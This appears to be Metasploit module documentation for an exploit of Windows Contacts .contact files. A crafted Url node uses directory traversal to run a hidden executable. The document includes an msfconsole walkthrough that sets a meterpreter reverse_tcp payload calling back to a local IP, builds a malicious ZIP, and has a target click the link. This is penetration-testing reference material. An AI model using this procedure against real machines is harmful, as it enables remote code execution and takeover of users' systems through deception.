64 lines
2.8 KiB
Markdown
64 lines
2.8 KiB
Markdown
|
## Description
|
||
|
|
|
||
|
|
This module allows remote attackers to execute arbitrary code on vulnerable
|
||
|
|
installations of Microsoft Windows. User interaction is required to exploit
|
||
|
|
this vulnerability in that the target must visit a malicious page or open a
|
||
|
|
malicious file. The flaw is due to the processing of ".contact" files <c:Url>
|
||
|
|
node param which takes an expected website value, however if an attacker
|
||
|
|
references an executable file it will run that instead without warning instead
|
||
|
|
of performing expected web navigation. This is dangerous and would be
|
||
|
|
unexpected to an end user.
|
||
|
|
|
||
|
|
Executable files can live in a sub-directory so when the ".contact" website link
|
||
|
|
is clicked it traverses directories towards the executable and runs. Making
|
||
|
|
matters worse is if the the files are compressed then downloaded "mark of the
|
||
|
|
web" (MOTW) may potentially not work as expected with certain archive utilitys.
|
||
|
|
The "." chars allow directory traversal to occur in order to run the attackers
|
||
|
|
supplied executable sitting unseen in the attackers directory. This advisory is
|
||
|
|
a duplicate issue that currently affects Windows .VCF files, and released for
|
||
|
|
the sake of completeness as it affects Windows .contact files as well.
|
||
|
|
|
||
|
|
## Vulnerable Application
|
||
|
|
|
||
|
|
Windows Contacts
|
||
|
|
(tested on Windows 10.0.18282)
|
||
|
|
|
||
|
|
## Verification Steps
|
||
|
|
|
||
|
|
1. `./msfconsole`
|
||
|
|
2. `use exploit/windows/fileformat/microsoft_windows_contact`
|
||
|
|
3. Configure the payload. For example: `set PAYLOAD windows/x64/meterpreter/bind_tcp`
|
||
|
|
4. Configure the payload parameters. For example: `set LHOST 192.168.1.1`
|
||
|
|
5. Enter the name of the user to be embedded in the contact, which will also be used as the filename for the .ZIP and .CONTACTS files. For example, `set FILENAME John Smith`
|
||
|
|
6. Enter the fake URL that the user must click to launch the payload. Note, this does not need to be a valid domain. For example: `set WEBSITE metasploit.com`
|
||
|
|
7. `run`
|
||
|
|
8. Confirm the ZIP file was created, and that it contains a `.CONTACT` file along with a payload in the `http` folder.
|
||
|
|
|
||
|
|
## Scenarios
|
||
|
|
|
||
|
|
### Exploiting a Windows 10 host
|
||
|
|
|
||
|
|
1. Configure the module-specific settings.
|
||
|
|
|
||
|
|
```
|
||
|
|
msf5 exploit(windows/fileformat/microsoft_windows_contact) > set WEBSITE metasploit.com
|
||
|
|
WEBSITE => metasploit.com
|
||
|
|
msf5 exploit(windows/fileformat/microsoft_windows_contact) > set FILENAME John Smith
|
||
|
|
FILENAME => John Smith
|
||
|
|
```
|
||
|
|
|
||
|
|
2. Configure the payload.
|
||
|
|
```
|
||
|
|
msf5 exploit(windows/fileformat/microsoft_windows_contact) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
|
||
|
|
PAYLOAD => windows/x64/meterpreter/reverse_tcp
|
||
|
|
msf5 exploit(windows/fileformat/microsoft_windows_contact) > set LHOST 192.168.1.148
|
||
|
|
LHOST => 192.168.1.148
|
||
|
|
msf5 exploit(windows/fileformat/microsoft_windows_contact) > run
|
||
|
|
|
||
|
|
[+] Creating 'John Smith.zip'
|
||
|
|
```
|
||
|
|
|
||
|
|
3. Send the ZIP to the target machine.
|
||
|
|
|
||
|
|
4. On the target machine, extract the ZIP file, open the .CONTACT file in the Windows Contacts viewer, and click the URL in the "Website" field.
|